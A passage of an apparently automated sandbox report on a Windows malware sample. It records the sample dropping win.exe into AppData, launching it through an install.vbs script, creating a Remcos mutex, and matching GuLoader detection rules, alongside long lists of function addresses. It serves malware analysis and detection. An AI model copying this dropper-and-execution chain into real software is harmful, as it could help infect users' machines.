            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056473C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568726
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564F2C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562FDC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005647DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005677EC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562F80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565F80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560FB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00564FAC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9AFE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0BF8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F86C3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0703
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5F4C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1210
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5224
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2A5D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1259
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2A50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3A49
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1286
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3A80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F12A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F92D4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F52C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2AC0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2AF4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3AEC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4AE1
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F12E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F131B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5310
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0335
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2B34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1331
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4B5F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F135C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B58
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B54
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1348
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3B44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0378
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B76
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F538C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2B84
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F13B4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4BB4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F03A8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3BA0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2BD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3BF8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F53E8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F03E4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9BE0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F101C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9018
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5003
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F083C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4834
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F082F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F305C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9056
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9048
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1078
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F109C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F508A
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0880
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4880
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F08D0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F50C0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4116
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5110
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4907
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F113F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0924
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1124
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4970
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5168
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1163
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F19BC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F51B0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F19A9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F49FC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F69F7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F463C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4E38
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0E24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8E54
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F664C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4E78
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0E70
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4698
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2E96
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F6694
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8EB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F36AA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4EA7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4ED0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F66EC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F46E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2F18
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0F04
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F473C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8F34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4F2C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8726
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4F55
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8F7C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4F79
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0F74
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3F88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2F80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5F80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0FB8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4FAC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2FDC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F47DA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F77EC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C18
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C08
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0430
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2C24
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0C4C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F6442
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F1C7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3C7C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F646C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C6C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C98
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9C88
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9CB4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4CA4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9CDC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F64D8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F44FF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9CFC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0CEC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8D1B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F6537
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4D36
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F6520
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9D20
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4554
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0D40
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4D90
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8DBB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0DB4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F65A0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4DD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8DD0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3DFC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F45F2
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F65EC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0DE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49AFE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40BF8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B486C3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40703
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45F4C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B412A4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41286
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43A80
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42AF4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B412E0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44AE1
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43AEC
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B492D4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B452C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42AC0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45224
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41210
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42A50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42A5D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41259
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43A49
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B413B4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44BB4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43BA0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B403A8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42B84
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4538C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43BF8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B403E4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49BE0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B453E8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42BD4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42B34
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40335
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41331
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45310
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4131B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B76
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40378
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B54
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4135C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44B5F
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B49B58
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43B44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B41348
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4109C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B40880
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B44880
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B4508A
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B408D0
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: win.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000000.00000002.287744976.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesydvestenvinden.exe vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000000.00000002.287913524.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000000.00000002.288617811.00000000029C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesydvestenvinden.exeFE2Xb vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350579233.0000000000970000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350579233.0000000000970000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000003.347443195.0000000000996000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesydvestenvinden.exe vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.353780760.000000001E1A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.353995720.000000001E2A0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.353995720.000000001E2A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.353722164.000000001DEC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeBinary or memory string: OriginalFilenamesydvestenvinden.exe vs SecuriteInfo.com.__vbaHresultCheckObj.9138.exe
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal100.troj.evad.winEXE@18/8@9/2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile created: C:\Users\user\AppData\Roaming\win.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-Q25VW5
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile created: C:\Users\user\AppData\Local\Temp\~DFFECDE5C1C60C79F5.TMPJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\AppData\Roaming\win.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\win.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeVirustotal: Detection: 31%
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeReversingLabs: Detection: 12%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000011.00000002.481658634.00000000020A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.540773096.0000000002B40000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.436722263.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.544208632.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.481233554.00000000021F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.287506520.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.350385300.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.287917619.00000000020A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.581406039.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.444587514.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000000.481116593.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_0040782B push 2A2CD880h; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_00409C42 push esp; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_0040941B push ds; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_00404CC4 pushfd ; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_00404C94 pushfd ; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_004077D6 push 2A2CD880h; ret
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0BF8 push esp; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A86C3 push ds; iretd
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0703 push ds; iretd
